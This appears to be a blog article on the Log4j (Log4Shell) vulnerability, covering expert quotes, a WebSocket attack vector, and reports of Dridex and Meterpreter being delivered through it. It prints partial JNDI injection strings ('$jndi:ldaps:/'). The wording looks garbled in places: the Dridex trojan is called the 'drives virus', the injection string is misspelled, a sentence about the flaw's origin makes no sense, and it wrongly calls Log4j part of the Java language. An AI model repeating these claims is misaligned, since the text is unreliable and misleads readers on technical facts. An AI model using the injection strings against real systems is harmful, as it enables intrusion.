Be on the lookout for the Log4j vulnerability! As we enter the New Year, this nefarious software issue has many in the information technology industry in a state of worry.
Many organizations, tiny and medium-sized businesses (SMBs) with no IT personnel, are undoubtedly unaware of its existence. However, they become more vulnerable to an assault due to their lack of knowledge of Log4j. They have no means of defending themselves.
Log4j is a portion of code that is prevalent in software programs since it allows them to keep track of their previous activity. To avoid reinventing the software wheel, code authors use this repeating code rather than implementing additional logging or record-keeping programs to do the same duties.
In a recent discovery, cybersecurity researchers discovered that simply using Log4j to record a line of malicious code, Log4j runs the malicious code in the background. As a result, malicious actors get access to Log4j-powered control systems.
This news caused practically every primary software business to enter crisis mode immediately. They investigated their products to see whether or not the Log4j vulnerability impacted them, and if so, how they might close the gap.
This level of vulnerability is significant. In the words of Theresa Payton, former White House chief information officer and current CEO of cybersecurity consultant company Fortalice Solutions, “Log4j has been around for more than a decade.”
“Think of it as your one-stop-shop for anything loggable.” We advise businesses to record everything since you may need it for forensics later. As a result, Log4J is often used by Java developers when they wish to register that a person has signed in and may even be used to monitor access to apps,” Payton said.
As a result, many firms may not even be aware that they have utilized Log4j, making it much more challenging to determine the severity of the issue. According to her, to find out, they would need a software engineer to go through the different systems and check for use patterns, after which they would need to look at the versions.
According to Payton, “it may be a time-consuming procedure,” and time is limited when you are racing against the clock to stop bad actors from exploiting security flaws.
Back Door for Hackers
Consider a door lock, which is used in a range of security hardware installations at millions of sites all over the globe to keep people and property safe. One component failure in a small sprocket that allows practically any key to unlock the lock has been identified in many different door locks.
Changing your lock is a simple task if you know the probable failure and have the necessary equipment to complete the replacement work. Doing so on a global scale is an overwhelming challenge. That principle is at the heart of the Log4j fiasco, and it is pretty concerning.
Log4j is a component of the Java programming language, which has been in use since the mid-1990s to develop applications. Software that runs Log4j code is used to power corporate and consumer applications worldwide.
Those that supply the digital backbone for millions of other applications are also impacted, including cloud storage providers. Major software vendors that provide apps utilized in millions of devices are also engaged.
As noted by Payton, when a security vulnerability is discovered, the chief information security officer (CISO) is often the one that takes the initiative to update and patch systems or put in place manual mitigations. Log4j is more subtle and difficult to detect, and it is not entirely within the authority of the CISO.
This vulnerability must be hunted down and discovered by everyone who works as a coder. Nowadays, progress can be seen almost everywhere. According to her, “developers might be internal personnel, outsourced development, offshore development, or third-party contractors.”
All of this adds up to an unending supply of attack opportunities for hackers. Of course, not everyone will be hacked, or at least not soon after the first attack. The first important thing is determining whether or not your equipment is affected by the faulty code. IT departments and software developers are already suffering from information overload due to the discovery.
“The ramifications of someone taking advantage of this weakness are the stuff of nightmares for me.” Payton cautioned that “an unethical hacker with knowledge and access might take advantage of this vulnerability and attack servers utilizing this logging capability in conjunction with remote code execution on servers.”
Attack Vectors Widening
Hackers are now fully aware of the Log4j vulnerability, actively exploiting it. According to cybersecurity researchers, a large number of examples have been reported in which bad guys have expanded the scope of their assaults.
In the early stages of the investigation, cybersecurity professionals assumed that the effect of Log4j was restricted to exposed and vulnerable servers. It is possible for anybody who has a vulnerable Log4j version to be exploited via the route of a listening server on their computer or local network by simply navigating to the website that triggers the vulnerability and then activating the exposure.
WebSockets have previously been used for internal system port scanning, but this is one of the first remote code execution exploits to be relayed through WebSockets, according to Jake Williams, co-founder, and CTO of incident response firm BreachQuest. “This is one of the first remote code execution exploits to be relayed through WebSockets,” Williams said.
“However, no one’s viewpoint on vulnerability management should be altered as a result of this.” According to him, “organizations should be putting out the effort to patch rapidly and mitigate by prohibiting outbound connections from potentially susceptible services when patching is not an option.”
According to John Bambenek, chief threat hunter at digital IT and security operations business Netenrich, although the local exploit is significant, attackers would likely prefer the remote exploit over the local exploit. As a result of these developments, relying on WAF or other network defenses is no longer a viable means of mitigating network threats.
The single most critical action an organization can take, according to him, is patching.
Threat actors already have a pretty simple attack vector for the Log4j vulnerability, which has been termed Log4Shell, according to the research by Blumer. It is not necessary to authenticate to have complete access over web servers.
Attackers may use this vulnerability to access external Java libraries through $jdni: LDAP:/ and $jndi:ldaps:/ and drop shells to launch the RCE attack without putting out any further effort. According to Blumer, this new attack vector increases the attack surface for Log4j even more. It can affect services even when operating on localhost and are not accessible to the internet.
“When the Log4j vulnerability was publicly disclosed, it became immediately evident that it had the potential to grow into a more serious issue. Blumer’s CTO and co-founder, Matthew Warner, said that this attack vector “opens up a range of possible malevolent use cases, from malvertising to establishing watering holes for drive-by assaults.”
In addition, by bringing this information to light, he says, “organizations will have the chance to respond immediately and defend themselves against malevolent threat actors.”
Log4j Linked to Dridex, Meterpreter
The Log4j vulnerability is an outgrowth of this issue. According to a study on Bleeping Computer, Log4Shell is another attack channel that researchers have uncovered that allows the infamous Dridex banking trojan or Meterpreter to infiltrate susceptible devices and spread the Dridex banking trojan.
The drives virus is a banking trojan intended to steal online banking credentials. It is now used to steal credit card information. A loader was created, which downloads numerous modules to execute activities such as installing further payloads, spreading to new devices, and collecting screenshots.
Dridex is mainly used to perform Windows operations, but if it falls on a system that is not running Windows, it downloads and runs a Python script for Linux/Unix to install Meterpreter.
In-memory DLL injection is used to launch Meterpreter, a Metasploit attack payload that only exists in memory and does not write anything to the hard drive. It offers an interactive shell that an attacker might utilize to investigate and execute programs on the target system.
Jen Easterly, the Director of the Cybersecurity and Infrastructure Security Agency of the United States, said in recent media appearances that the Log4j hole is the most significant weakness she has encountered in her decades-long experience as a cybersecurity professional. According to cybersecurity experts, the Log4j vulnerability is the essential software hole in history regarding the number of services, websites, and devices compromised.